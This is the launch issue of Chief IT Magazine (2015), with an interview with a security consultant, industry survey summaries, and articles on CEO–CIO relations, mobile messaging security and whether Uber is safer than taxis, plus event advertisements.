POWERED BY THE CIO LEADER'S SUMMIT,
ASIA PACIFIC 2015 - 2016 Spring 2015
Reviving the CEO Relationship
Mobile Messaging
Digital Disruption: Is Uber safer?
$8.95 INC. GST
The best way to fend off DDOS
Power of penetration testing
Strategies used by Islamic State to recruit on social media
PLUS TechTime l Cyber-TechTime
PROTECTING BUSINESS AND GOVERNMENT WORLDWIDE. • • • • •
Cyber Security Solutions Advanced Threat Intelligence and Investigation Sophisticated Cyber Analytics Managed Security Services Cyber Security Consulting Services
For more information, contact us at learn@baesystems.com
baesystems.com/ai twitter.com/baesystems_ai linkedin.com/company/baesystemsai
Contents Editor's Desk 3
Executive Editor / Director Chris Cubbage Director / Co-founder David Matrai Marketing Manager Kathrine Pecotich Art Director Stefan Babij Correspondents Kema (Johnson) Rajandran Sarosh Bana Adeline Teoh
MARKETING AND ADVERTISING Kathrine Pecotich T | +61 8 6361 1786 promoteme@australiansecuritymagazine.com.au
Quick Q & A - with Stuart Mills
4
Security Survey Summary
6
Cyber Security Reviving the CEO relationship with his IT heads
8
Mobile Messaging
10
Digital Disruption Paper - Is Uber Safe?
14
Its all about Cyber Security
16
BAE Systems Applied Intelligence Feature 20 The best ways to fend of DDoS attacks
22
The power of penetration testing in boosting cyber resilience
26
‘But you are a woman’ - with Michelle Weatherhead
28
Security and risk management the next evolution
30
Page 6 - Reviving the CEO
relationship with his IT heads
Strategies used by Islamic State to recruit on social media 32 Anatomy of a cyber attack 34 F5 State of application delivery
36
TechTime - the latest news and products
41
Cyber TechTime
44
SUBSCRIPTIONS
T | +61 8 6361 1786
Page 10 - Digital Disruption Paper
subscriptions@mysecurity.com.au
- Is Uber Safe?
Copyright © 2015 - My Security Media Pty Ltd 286 Alexander Drive, Dianella, WA 6059, Australia T | +61 8 6465 4732 E | info@mysecurity.com.au E: editor@australiansecuritymagazine.com.au All Material appearing in Australian Security Magazine is copyright. Reproduction in whole or part is not permitted without permission in writing from the publisher. The views of contributors are not necessarily those of the publisher. Professional advice should be sought before applying the information to particular circumstances.
CONNECT WITH US www.facebook.com/apsmagazine www.twitter.com/apsmagazine www.linkedin.com/groups/Asia-PacificSecurity-Magazine-3378566/about
OUR NETWORK Like us on Facebook and follow us on Twitter and LinkedIn. We post about new issue releases, feature interviews,
Page 18 - The power of
events and other topical discussions.
penetration testing
Correspondents* & Contributors
www.youtube.com/user/MySecurityAustralia
www.asiapacificsecuritymagazine.com
Kema (Johnson) Rajandran*
Horden Wiltshire
Martin Ryan
Sanjay Samuel
Sarosh Bana*
Suart Mills
Gavriel Schneider Dave Jarvis
Adeline Teoh*
Dr Robyn Torok
Glen Francis
Tiong Gee Ng
www.australiansecuritymagazine.com.au
www.drasticnews.com
|
|
www.youtube.com/user/ MySecurityAustralia
2 | Chief IT Magazine
www.cctvbuyersguide.com
Editor's Desk
W
elcome to a brand new publication, ChiefIT.me Magazine, launched with our industry partners Media Corp International who run the CIO Leaders Pacific Series Summit across the ASEAN, Greater China and ANZ regions along with the CIO Academy Asia. In this launch edition of ChiefIT.me Magazine, we look at the safety advantages of Uber, some of the more concerning cyber security trends and we have a great insight into the CIO and CEO relationship. We have also gathered insights into the corporate board considerations needed for the digital disruption and growing use of application based architectures. Wherever your organisation is heading, we aim to be informative across the digital transformation spectrum. With our colleagues across Asia we will be looking to compare, contrast, learn and share. Evolving beyond just the web and news channel, we aim to bring the CIO, CISO and CTO fraternity more targeted and insightful learning and networking opportunities. Plus offering an open media platform to work and connect across industries. As part of our launch we are being launched exclusively for the FSI Leaders Summit, Sydney, CIO Leader’s Summit Melbourne and the CIO Academy Asia, based in Singapore. Our other key annual industry events includes Gartner, CeBIT, RSA, AISA and AusCERT. ChiefIT.me Magazine will be a sibling publication to the Asia Pacific Security Magazine and Australian Security Magazine and we continue to have a growing technology channel network. If you’re a new reader, we welcome your subject matter expertise, opinions and research publications - case studies are great too! So engage with us and we look to welcome new partners along who are keen to join and as always, promote innovations, insights and inspirations!
“The great myth of our times is that technology is communication.” - Libby Larsen
Yours sincerely, Chris Cubbage CPP, RSecP, GAICD Executive Editor
Chief IT Magazine | 3
....with
Stuart Mills
Director ES2 Queensland How did you get into the security Industry? Similar to most people I suspect, it happened by chance! After roughly a decade of selling enterprise software solutions, (mainly CRM and ERP systems) I took a year off and did my MBA at Macquarie Graduate School of Management. Upon completion of this an old boss hired me back into a newly formed company called CyberTrust (now Verizon CyberTrust). I started mostly selling but I soon learnt more and quickly achieved various accreditations which enabled me to start consulting too. It was now 2004, the dawn of PCI DSS, and it was a very good time to have an Honors Degree in Banking and Finance and became a very exciting new career in Information Security. How did your current position come about? After experiencing all aspects of an IT corporate environment; selling and consulting for Cybertrust, and then leading the security practice as a Senior Manager at Ernst and Young then becoming the Head of Security for Bankwest. I thought it was time to do something a little different, I have invested in a rapidly growing IT consulting company called ES2 to help lead the East Coast expansion. ES2 had done great work for me in my role at Bankwest on a number of my major security transformation projects. I felt it was time to leave the Bank and I couldn’t resist the opportunity to take a stake in the company and help lead the future expansion for both Security and Information Management. What are some of the challenges you think the industry is faced with? The lines are blurring across all aspects of delivering frictionless experiences to customers, what is clearly being seen is that if companies don’t embrace significant change, then someone somewhere will figure out how to disrupt part of their value chain. The four megatrends currently impacting the world of; ‘Cloud’, ‘Big Data’, Social Media’ and ‘Mobile’ are confusing the hell out of executives. Most companies have not made the necessary investments in infrastructure, frameworks, governance and skills over the past decade to start to leverage any of these megatrends and need help even knowing where to begin. As security professionals we all know the days of a secure perimeter are behind us but Executive Boards still aren’t really getting the
4 | Chief IT Magazine
significance of the new digital world. Automation projects designed to eek out 10% productivity improvements here or there are missing the point. ‘Digital Transformation’ is the challenge, Executives should be trying to work out how they can disrupt their own value chain before someone else does. Even the big consulting houses are only just starting to get their positions regard to security the biggest challenge is moving executives minds away from compliance to understanding the dynamic nature of threats and the need to realign security controls from just Protect / Detect and
embrace the full length of the cyber kill chain (See page 36 ) Where do you see the industry heading? In relation specifically just to security I see more and more that the role of security being outsourced and managed in the cloud by third parties. Big Data analytics will play a huge part in the ability to predict malicious activity (see OpenDNS for example) and give early warning signs to organisations where they may
be vulnerable. The need for more and more rapid delivery of functionality to mobile devices for consumers, and the increase in security automation in the software development lifecycle. To me, Continuous delivery = continuous monitoring and continuous testing. Just pen testing a change at the end of a development cycle won’t cut it any more as CIO’s thirst for velocity of change and reliability of service. I also see a big change in consumer sentiment towards the data that they trust with companies, privacy and ethics will feature much more in a consumers decision on where to put their business. Cloud, Big data, Social and Mobile are no longer separate problems they are highly interdependent areas of maturity for organisations. New consumers in what I call the ‘Do it for me economy’ just want a service that can predict their needs before they know they need something and offer a simple button that they can press to get it. The only way that organisations can deliver the velocity, scalability, sustainability, and trust that this new generation
of consumers want is by achieving massive and constant transformation, and that’s not an IT problem, that’s a Leadership problem. The average tenure of a company on the Fortune 500 in 1965 was over 60 years, it’s now less than 10 years. There’s a reason for that! … the pace of change, driven by visionary leaders and delivered by the right technology partners. What do you do when you’re not working? Getting out on the ocean, windsurfing, Supping etc. Actual title of current position? Director ES2, Queensland How long have you been there? 10 seconds How long have you been in the security industry? 11 years
What are your previously notable positions? Head of Information Security at Bankwest Senior Manager IT Risk and Assurance Ernst & Young. Director, financial Services Sector, Verizon Cybertrust. Is there anything else of importance to note about your current position/company? ES2 are expanding and maturing at a very rapid pace. Our East Coast expansion plans are also coupled with a national overlay of more strategic advisory services to help executives understand the challenges set out above. It’s all very well and good knowing you need to replace a firewall or a proxy but if you don’t have a multi-year cyber security and information management strategy that embraces cloud, big data, social and mobile then you’re probably just standing still with the decisions you are making.
Chief IT Magazine | 5
The Region’s Leading Government and Corporate Security Portals
Print Post Approved PP255003/10110
Print Post Approved PP255003/10110
THE REGION’S LEADING GOVERNMENT AND CORPORATE SECURITY MAGAZINE | www.asiapacificsecuritymagazine.com THE COUNTRY’S LEADING GOVERNMENT AND CORPORATE SECURITY MAGAZINE | www.australiansecuritymagazine.com.au July/Aug 2015 Aug/Sep 2015
Security 2015 Q&A ONVIF & COMPLIANCE
PART II Counter-Terrorism Feature Radicalisation, Role of the Media & ISIS Social Media Tactics
Mobile Messaging
It’s all about Cyber Security
IMPROVED BORDER SECURITY The Holy Grail for airports
Security & Risk Management the next evolution
Outstanding Security Performance awards, the OSPAs
Torrentlocker malware reported to the Australian cybercrime online reporting network
From Infosec to intelligence-based cybersecurity
UAVs civil market future expectations
The stratum of work in the security industry
The modern ‘Sherlock Holmes’ of the cyber world…in Silicon Valley
THREATS ARE MOUNTING ACROSS THE TECHNOLOGY LANDSCAPE
PLUS
PLUS
$8.95 INC. GST
TechTime l Cyber-TechTime Movers & Shakers l Quick Q&A and much more... ASM_AUG_SEPTEMBER_2015.indd 1
$8.95 INC. GST
TechTime l Cyber-TechTime Movers & Shakers l Quick Q&A and much more...
4/09/2015 12:31:08 PM
|
|
For more information and to subscribe visit: www.australiansecuritymagazine.com.au | www.asiapacificsecuritymagazine.com
Chief IT Magazine | 7
Security Survey Summary Quick Q&A
AUSTRALIAN RESEARCH: Attitudes towards breaches and data theft highlight role of law and penalties Websense, Inc has announced the results of a survey of 100 Australian security professionals. Nearly all respondents (98%) believe that the law should address serious data breaches that expose consumers’ data loss through punishments such as fines (59%), mandatory disclosure (65%), and compensation for consumers’ affected (60%). Twenty three percent even advocate arrest and jail sentence for the CEO or board members. Respondents feel that companies that are not taking action against data loss and theft have it as an agenda item, but it’s not yet a high enough priority (38%). Furthermore, 41% say the CEO should hold ultimate responsibility should a breach arise. And the pressure is mounting, as 72% of all respondents believe the advent of the Internet of Things will make companies even more vulnerable to data theft. Nearly three quarters (64%) of respondents say employees would connect to an unsecure WiFi to respond to an urgent request by the CEO or company executive; with even 42% of security professionals saying they would do so themselves. As data theft disclosures hit the headlines, it appears to be inadvertently helping companies address the issues. More than half (62%) of security professionals feel the publicity has helped other companies create a case for budget, focus and resources. But nearly a quarter (24%) believe that the headlines have hindered this as they make companies feel powerless to protect against these attacks. Bradley Anstis, ANZ Sales Engineering Manager at Websense explains: “Despite all of the large-scale attacks we’ve seen over the past year, many businesses still don’t recognise the risks they face and the potentially devastating impact of a breach. Businesses can no longer afford to ignore the risks or to waste time and resources implementing security solutions that aren’t tailored to meet their needs. It’s all about developing the right-sized security strategy for your business. But by taking a holistic, data-centric approach, IT security teams can gain visibility of their security gaps, identify the threats to their data and protect their critical information from data theft.” *
Australian Organisations Lack High Priority Data Security Practices as 31 percent of Workers Indicate that Corporate Confidential Information is at Risk LogRhythm, has announced the results of its Australian Workplace Security study which highlights the need for better enforcement of corporate data security measures. Nearly a third (31 percent) of respondents to the survey – 1003 employees and managers of medium to large organisations across Australia – reported that there has been at least one recent ‘security event’ at their workplace. When asked about vulnerabilities, a third (33 percent) of employees and 43 percent of managers said that confidential company information is susceptible to being stolen or accessed by unauthorised people. 72 percent of workers believe the greatest threat to data security is employee related due to them downloading infected files or malware, or simply not thinking about security. And 16 percent admitted to accessing documents that they shouldn’t really be looking at while at work. The extent of data security exposure that Australian organisations are facing can be seen when relatively small overall percentages are extrapolated into real numbers: the 12 percent of respondents who admitted to having accessed or taken confidential documents from their workplace without proper authority potentially equates to 719,000 employees across Australia. Of great concern too is that from that group of respondents, 7 percent did so after they had stopped working for the company – the main reason being to help them in their new job. This is a very real example of lost confidentiality and IP. Encouragingly, 95 percent of managers say that their company ‘is serious about the security of information’ and that the majority of its employees take information security seriously (40 percent say that ‘everyone’ takes it seriously and a further 46 percent say that ‘the majority take it seriously’). But LogRhythm is concerned by the 5 percent that say their company is ‘not very serious about the security of information’ as this figure extrapolates to 59,000 managers nationally. *
* For more information on these articles in Security Survey Summary check out our website at www.australiansecuritymagazine.com.au 8 | Chief IT Magazine
F5 Survey Indicates Growing Hybrid Deployments Across Asia Pacific F5 Networks has released findings from ‘The State of Application Delivery in APAC 2015’ survey, which found that enterprise applications are increasingly being moved into the cloud as organisations embrace the “cloud-first” philosophy. Based on survey data from 3,200 IT decisions makers across the Asia Pacific (APAC) region, the findings detail their current and planned use of application services. Growing number of applications and flexibility of cloud Findings further reveal that the use of applications by APAC companies is growing and shows no sign of abating. Amongst those surveyed, almost half (45%) currently deploy between 1-200 applications, while almost 10 per cent of organisations currently deploy more than 3,000 applications. The study also showed that at least 41 per cent of IT decision makers are open to moving up to a quarter (24%) of their applications to the cloud by 2016, while almost 24 per cent are keen to move between 25 to 50 per cent. “As applications continue to be a critical part of the business strategy, organisations are seeking the same confidence level in cloud deployments that they’ve seen in the data centre. Companies in every industry rely on applications to drive customer engagement, employee productivity and revenue today. In fact, our research revealed that mobile applications and big data analytics are considered more important trends than the Internet of Things. These findings suggest a growing hybrid environment across the region, with a mix of on premise and off premises solutions increasingly being adopted by enterprises,” said Emmanuel Bonnassie, Senior Vice President, Asia Pacific, F5 Networks. Obstacles for hybrid cloud adoption Despite the growing popularity of hybrid clouds, 29 per cent of organisations attributed slow adoption to the failure to identify a comprehensive identity and access management policy. Furthermore, another 35 per cent also admitted to the lack of internal knowledge of the scope of cloud usage as an impediment to adoption. *
If you have an entry for Movers & Shakers please email details and photo to editor@australiansecuritymagazine.com.au
The world’s most powerful, easy to use end-to-end security solutions.
Avigilon’s industry-leading HD network video management software, megapixel cameras, access control and video analytics solutions are reinventing security. Learn how at avigilon.com
Reviving the CEO relationship with his IT heads
e know that technology is the future for nations, organisations and individual productivity. We see a vast majority of the human population using technology on a day to day basis like their phones, mobile applications, tablets and other gadgets like wearables. Yet, a vast majority of these individuals, many of whom work for corporations, do not care about their IT (information technology) function. Is this of any surprise? We see companies moving their Head of IT roles to a CFO, a COO, or other lines of functions. If we agree that technology is the future of society and if a company wants to remain competitive and not be disrupted, why does the CEO not want a crucial role to be reporting to him. He could make a world of difference for the company, grow the business in new ways, streamline business costs using tools, enter new markets, innovate, and so on...why, is he not interested in IT? One IT head once shared this story. On his first day at a new company, it dawned upon him that users approaching the IT function were treating his function akin to going to the laundry. “Doing your laundry is a necessity but one does not like doing it. Doing the laundry takes time, effort and money! In addition, doing the laundry is not an important priority in life, it is something you need to do but might want to consolidate the amount of time doing it to once a week. Just ensure the washing machine works, the clothes come out clean and if you have a helper who can help iron it, all the better.” On the first day, he was assigned a cubical near the back entrance. Colleagues remarked “ah the IT guy is here. I need help with my laptop, I am unable to access the internet. Can you check?” As the CIO of the company he felt dejected and
W
10 | Chief IT Magazine
he wondered if he had entered the wrong company. It was a good first-hand experience of a company with employees who do not understand the IT function even if they may be keen users of technology. Many possess the latest phone and gadgets. On the other side of the fence, a CEO shared that his CIO only knows how to spend money. His IT department had spent millions of dollars a year. However his CIO could not demonstrate the value that it brings to the business. When pressed for more clarity and details, he was presented with a deck of over 100 slides detailing system architecture and implementation details, which he had no interest in. What he required from the CIO is in fact very simple, he did not require a 100 slide presentation but would rather be informed in fewer slides that explain to him the business value, how it can help in the business in business terms and not ‘geek talk’. There are organisations and employees (non-IT) who struggle to appreciate the value of the internal IT organization and the use of technology to enhance their business operations, to help with innovation and business growth. Similarly many IT employees have not helped themselves as they struggle to explain how IT can help their company besides doing the basics - laundry 101 – of keeping their machinery working, clothes cleaned and then ironed. IT heads struggle to make themselves relevant to their business because they do not know how to or want to engage with their non-IT colleagues. At times living in one’s IT world is a good one as vendors treat us well. Why bother with other colleagues who do not care about what you do. There is also an expectation gap. CEOs want their IT
Cyber Security
heads to lead and tell them what is needed. IT heads prefer to wait for directions, and when they do engage, they talk in terms that their CEO might not appreciate. “We have to do cloud, big data, analytics, we got to have this mobile app, our storage and networks need an upgrade, etc”. We probably have all but 30 seconds of the CEO’s attention. Having said the above, this is not true of all companies or leaders we have met. There are technology savvy CEOs, there are IT functions that report in to the CEO, there are CIOs and IT heads, who are business savvy and are able to engage well with their colleagues across function. There are CEOs who understand how to leverage technology to the advantage of the business. He knows what he wants and if his IT head cannot meet his need, he replaces him with someone who can. What could be done to strengthen ties and form lasting relationships between the CEO and his “CIO”. This is a symbiotic relationship. CEOs who fail to appreciate how technology can help their business WILL be disrupted. CIOs who fail to engage with their CEOs will have their careers disrupted. There are companies that recognise that CIOs need to play a more strategic role. In fact some have started to have a COO of IT to look after operational aspects of IT, freeing up the CIO to concentrate on engaging the business and working on strategic business initiatives. Whether this will become the future of IT functions depend very much on how the CIOs engage their CEOs.
To the CEO • • •
Take interest in technology and learn from competition how technology can be harness to innovate; Relook your relationship with your CIO and begin to re-engage; The world is evolving at such great technology speed, and there are many new startups with technologies that are disrupting the traditional ways of doing things.
Get involved and work with these startups for ideas; • Leverage your IT to check for new ideas; • Develop clear business goals for your IT to achieve; • Where CIOs lack the business or finance skills, groom them with training.
To the CIO (Head of IT) • •
• • • • • •
IT needs to start being creative by thinking outside the box; Always have an inquisitive mind to learn soft skills and key skills needed to engage with your colleagues. This includes communications, facilitation, finance and presentation skills; Be active and join professional associations to network and practice your engagement skills; Join the Boards of companies to practice facilitation and putting your skills of influence to practice; Be open to learn from IT leaders who have done well; Pick up the sales skills from your vendors; Be humble, just as how your vendor sales reps are treating you; Learn the language of business. Many CEOs does not know how to communicate with CIOs as they do not
“We have to do cloud, big data, analytics, we got to have this mobile app, our storage and networks need an upgrade, etc”. We probably have all but 30 seconds of the CEO’s attention.” understand nor have the patience to learn ‘geek speak’. CEOs are busy people, and the ability to be concise and piece it all together to demonstrate business value will put the CIO as a trusted partner of the CEO. With most businesses going through a digital transformation, there has never been a better time for CIOs to prove his value as a business leader. He needs to be able to execute all the points listed above and more. The tasks might be daunting, but the rewards and satisfaction that come will be outsized. Authored By Glen Francis President, IDeationEdgeAsia.org President, CIOAcademyAsia.org Vice President, ITMA.org.sg A senior executive with achievements in leading global technology departments, large scale corporate transformation initiatives, helping start-up companies, and being in involved in social enterprises. Well-travelled and well versed with the management of teams across various continents. Ng Tiong Gee SVP, IT, Engineering and Estate Management, Resort World Sentosa. Independent Board of Director, YellowPages Ltd Lead Independent Board of Director, Pacific Radiance Ltd An accomplished C and Board level executive with proven success in building and leading high performance teams across multiple geographies. A strategic thinker that is versatile in playing multiple roles at large and small corporations. Successfully integrated two of the largest independent semiconductor Assembly and Test providers in the role of Lead Integration Manager. CIO Academy Asia At CIO Academy Asia, we enable ICT professionals to gain relevant skills and knowledge they need to advance their careers. We believe success comes when you have the right mentor guiding you. At our academy, we share relevant, reallife industry collaborations. We impart practical knowledge of the inner workings of an ICT environment, which will prepare you to be the next ICT industry leader. Our team of experienced CIO-grade lecturers come from established and listed companies. Our seminars are created with their input, resulting in structured presentations complemented with sensible material. This allows every participant to gain the “other’ perspective, how one can be an ICT leader, with the modern proficiency and skills to navigate the ever changing global environment.
Chief IT Magazine | 11
Regional
Mobile Messaging Company reputation and security risks rise as business mobile messaging usage increases
By Horden Wiltshire
12 | Chief IT Magazine
P
hone hacking was once thought of as News of the World type media spying on the private calls of royals and celebrities. That’s rapidly changing because any phone user, right now, could be under the watchful eyes of forces far more malevolent than a gossip sheet. Consumer messaging phenomenon, WhatsApp disrupted the highly profitable SMS market and forever changed the power and potential of IP messaging. Consumers flocked to the service and businesses are jumping on the bandwagon to apply it commercially. Soon, business use of IP messaging will outstrip that of consumers. In the $50 billion world of enterprise messaging, businesses of all sizes use mobile to communicate with clients and customers. In addition to exposing personal data, those messages often contain sensitive information such as intellectual property, classified legal documents, medical reports, investment intelligence, and other financial information.
been hit with expensive breaches. US health insurer Anthem was targeted in late January where attackers tried to get private information about individuals on health plans – their names, addresses, birth dates and income data. Morgan Stanley also reported a major breach after an employee stole data from around 350,000 brokerage accounts and posted it for sale online. However attack patterns change quickly and criminals are turning to less protected ecosystems such as mobile devices. The most common exploit is malware contained within apps - often downloaded from third-party app stores or from unknown links. Those behind these hostile invasions want to exploit personal data, audio, and screenshots. It’s unthinkable to connect a PC or laptop to the internet without up-to-date virus protection, but workers do it every day with phones and tablets. And while companies spend considerable sums securing desktop systems, little thought is given to securing mobile information.
Criminals change their attack patterns quickly
Top management failing to see mobile risks
Attacks on traditional IT systems for such information are not new. This year Healthcare giants to financial stalwarts have
In fact management of many of our top companies either doesn’t seem to be aware of the mobile vulnerabilities, or don’t think it will happen to them.
Agency Introduction
Research undertaken at a workshop on enterprise messaging with some of Australia’s leading CIOs earlier this year found only 25 per cent of participants thought secure messaging on a phone as being very important. More than half of the CIOs thought it was not important at all believing people use email to communicate important matters, not mobile devices. The reality is critical communication is being conducted outside traditional channels, and increasingly via mobile messaging. Security weaknesses of devices – from non-passwordprotected phones to unencrypted Wi-Fi transmissions - are magnified further as employers opt for BYOD. With BYOD, businesses are tempted to ‘lock down’ the entire environment with costly mobile device management (MDM) solutions which typically create a work/personal split on a device. However for many businesses MDM is overkill and as much of what businesses do is in a messaging context, a securing messaging solution is suitable and much less expensive. BYOD users can also be required to use anti-virus programs – and that’s best practice - but it won’t stop a hacker trying to crack into app software code or the device’s software code, it just slows them down. Hackers want people to fall for phishing scams so they can install the malware that helps them do their dirty work. There’s also evidence in these scams that a mobile user’s identity may be spoofed by an unknown source (disguised as a user known to the receiver), no amount of securing the communications channel alone would be of any benefit. Multi layer encryption changes the game
confidence to a business to innovate and be agile in the way it interacts with customers and knowing it’s completely safe to do so. There are certain communications when a business either can’t or won’t use messaging due the nature of the conversation. Encrypted messaging means any message classified or highly confidential – can be delivered via mobile platforms. Industries such as health are fast movers in this space given the obvious sensibilities of patient and case information. This sector is already looking at the huge benefits of doctor to doctor and doctor to patient secure messaging. Secure enterprise messaging market is ripe for disruption, but it won’t be led by the ‘free’ consumer based apps such as WhatsApp, as they don’t meet the specific needs of the business market. These apps fall short of the necessary compliance, security, integration and performance capabilities required for most businesses, particularly large enterprises. While business gets up to speed on how to deal with the risks of mobile messaging there’s a critical first step: at the very least organisations should have secure messaging for crisis management teams and senior executives to communicate effectively and securely on a daily basis. About the Author Horden Wiltshire is CEO of Soprano Design, the creators of GAMMA and world’s leading secure mobile messaging technology provider to international mobile network operators.
Some IP solutions say they have secure networks but securing enterprise mobile messaging involves considerably more than simply encrypting the channel. A key component is guaranteeing/verifying the identity of the sender and the recipient to truly thwart attackers. Enterprises that have already adopted SMS or consumer-grade IP messaging solutions, without this important validation are at risk, particularly as hackers begin to more aggressively target known security limitations. To close the gap CIOs must focus on securing their entire messaging ecosystems. The starting point is to audit a company’s internal and external business workflows, processes, and use cases to understand whether a secured ecosystem or secured mobile solution would better meet their needs. Developing solutions with high and multiple levels of encryption and auditing capability is where the game is changing and there’s immediate relevance for Australian hospitals, government organisations and financial institutions. For those in highly regulated environments – banking and finance in particular - the ability to track all communications gives CIOs a bird’s eye view of all mobile messaging communications for auditing purposes. Secure information a springboard for innovation However being able to ‘protect’ information is more than a security concern - it’s a springboard to providing
Chief IT Magazine | 13
EX E C U TIV E B O ARD RO O M LUNCHEON INVITATION
EXCLUSIVE TO COLLEAGUES
CIO, CISO & CSO THURSDAY 24 SEPTEMBER 2015 12.15 PM - 2.15 PM
131 ST GEORGES TERRACE, PERTH
Security as an enabler for cloud computing James Turner Senior Advisor IBRS
As an IT leader, you understand the potential advantages and benefits that cloud computing could bring to your business. It can enable you to innovate and accelerate business, enhance customer experience, provide employee workplace mobility and increase efficiency. You are also aware that protecting your organisation’s technology assets is one of the biggest challenges in embracing cloud. How can you ensure your cloud environment has rigid security in place be it in public, private or hybrid consumption models? Join James Turner, Senior Advisor, IBRS as he facilitates a discussion on security-business alignment challenges in the mobile cloud era and the safeguards you can put in place to protect your data and applications.
Subject matter experts, Armando Dacal, Regional Vice President, Palo Alto Networks, and Arthur Iliakopoulos, Southern Region Manager, Network and Security, VMware, will also be attending. In this invitation-only executive lunch session, held under Chatham House Rule, we invite you to join your peers in a frank discussion on the challenges and best practices of the journey to cloud. I will be calling you in the next few days to confirm your attendance. Regards,
Chris Cubbage
Director & Executive Editor Australian Security Magazine & ChiefIT Magazine
Kindly RSVP by 15 September to ccubbage@mysecurity.com.au or 0432 743 261
PROUDLY ORGANISED BY
14 | Chief IT Magazine
WEBINARS UPCOMING WEBINARS:
Protecting critical value data from the inside FEATURING Keith Lowry
Keith Lowry
NUIX Senior Vice President, Business Threat Intelligence and Analysis
NUIX Senior Vice President, Business Threat Intelligence and Analysis
MORNING SESSION: Date: Thursday 17th September 2015
Time: 9am AEST
Duration: 45 mins + Q&A
Security requirements for critical infrastructure FEATURING Peter Bartzios
Paul Mills
SIEMENS Technical, Sales and Management
SIEMENS Product Manager and subject matter expert
AFTERNOON SESSION: Date: Thursday 17th September 2015
Time: 1pm AEST
Duration: 30 mins + Q&A
To register for these webinars, visit:
www.australiansecuritymagazine.com.au
Chief IT Magazine | 15
Cyber Security
DIGITAL DISRUPTION DISCUSSION PAPER:
Is Uber Safer?
U
ber is the dominant player in the new era of ridesharing. A common concern that has been raised is the safety of this means of transport and if security professionals should be recommending it or banning it. As a security professional with a global focus I recommend Uber and consider it a significantly safer option then a regular taxi service. This article seeks to argue from a security stand point why Uber is a safer alternative: Driver information - When you enter an Uber you already have the driver’s name, license plate number, photo and type of vehicle. This means you can immediately check that the person picking you up is the registered driver before entering the car. In many countries taxis do not display a visible photographic license or you are unable to compare it to the driver until you are already in the vehicle. Additionally taxi licenses often display a number with no visible way of telling if the license is connected to this particular taxi or if the license has expired or been cancelled. Visible vehicle approach - You can see the status of your vehicle on approach which mean you can remain inside the safety of your home or office until the vehicle has arrived. Particularly when transiting from busy nightclub or bar districts, the ability to remain within the security of a venue rather than standing on the street is a bonus. A large number of violent altercations occur on the streets of such districts and often at taxi ranks where intoxicated individuals cut the line. Some taxi apps also provide this flexibility but this is often limited outside of developed countries. Tracking – although some developed countries have hardwired GPS systems in their taxis that the driver is unable to switch off, most taxis globally do not have this technology. It is true that the tracking system used by Uber can be disabled by
16 | Chief IT Magazine
a driver shutting off their phone. But what are the benefits of a tracking system for personal safety? Taxi companies do not live track their drivers and take action if they detour off their route, so the tracking technology is really only of evidentiary benefit after an incident occurs. The strength of Uber’s system is the ability for a supervisor or a friend to live track your progress. They can either order an Uber on their own phone, place their colleague or friend into the Uber and then track them on their way home or have you activate the “share your eta” feature on your own mobile which will also provide them with live tracking. As a manager, if I send a drunk colleague home in a cab, the best I can do is record the taxi plate. However, using my Uber app I can live monitor them all the way to their destination, and if the tracking is switched off, I already have the vehicle details and last known position to provide to Police for an immediate response. Insurance – a number of comments have been made about insurance, but with a million rides a day I still haven’t seen any cases where a passenger has been injured and not received the appropriate insurance they would have been entitled to riding in a taxi. The number of instances where a business person would ride in a vehicle with a nonprofessionally licensed driver are numerous: visiting a foreign city a customer provides one of their staff to drive you around the city, you organise a tour from a vendor on the street and have them pick you up from your hotel to see the sights for the day, a local friend picks you up to take you to dinner. In all of these cases comprehensive travel insurance would have you covered and it would equally apply to you sitting in the back of an Uber. Incident response – if an incident occurred to a traveller in a foreign country while riding in a local taxi, it would be
... using my Uber app I can live monitor them all the way to their destination, and if the tracking is switched off, I already have the vehicle details and last known position to provide to Police for an immediate response.’
extremely difficult for a corporate security professional to immediately respond. We would have to try and identify which taxi company was used, if they are centrally controlled, identify a contact number and likely battle through a language difference. With Uber I can call its security team and ask for assistance, with Uber increasingly concerned about their global reputation I am confident they would take all necessary steps to assist us. Background checks – background checks are inherently flawed as a single layer of defence. Edward Snowden was cleared to access to the top secrets of the US Government but this did little to prevent him from sharing them with the world. A simple legal name change will defeat the majority of background checks undertaken by private companies. Background checks will also differ in their effectiveness based on location. For example, police in India do not have a central criminal database and therefore you might have to undertake checks with multiple independent police services to accurately determine an individual’s criminal history. Uber does undertake background checks, as do most taxi companies, but increasing the frequency of such checks does not necessarily lead to a safer driver. Additionally every jurisdiction in the world has different rules for who can access criminal convictions and when such convictions are wiped or not recorded. Regardless of the checks being conducted you are always taking a risk when sharing a vehicle with any person you do not know personally. Rating – Uber drivers are aware that each of their passengers rate their driving and their service. Most taxi drivers are aware that it is difficult for passengers to report misbehaviour, poor driving or rudeness. For a foreign traveller, the ability to identify how to report a taxi driver is almost impossible. Over time those Uber drivers who fail to adhere to road rules or act inappropriately will be rated poorly and banned from driving. Conversely, taxi drivers know their behaviour is rarely reported and they will take a significantly longer period to identify and for action to be taken. It is well known that some taxi drivers specifically target foreigners; Uber’s rating system puts everyone on an equal playing field. Overall Uber provides a safer alternative then most taxi services. Of course trusting your safety with an unknown individual will always come with risks. Staying in a hotel where numerous unknown staff have 24 hour access to your
room, letting the delivery driver into your home to place a heavy box in the kitchen, providing spare keys to a AirBnB guest who has plenty of time to nip away and cut another set of keys, paying good money to be locked in a room with a stranger and just a towel for a massage, and of course jumping in car for a ride be it a taxi, Uber or a friend of a friend. There may be particular cities or states around the world where the local taxi service is tightly regulated and provides significant safety features, but Uber is a global provider and should be treated as such. With many businesspeople travelling to multiple cities across the world, often for short durations, examining each of the myriad of local transport options and comparing safety features is not viable. Uber provides a good level of safety that is provided globally and this is a boon for travellers. The author has no affiliation to any lift-service provider or taxi authority.
Chief IT Magazine | 17
Cyber Security
It’s all about cyber security
By Sarosh Bana
18 | Chief IT Magazine
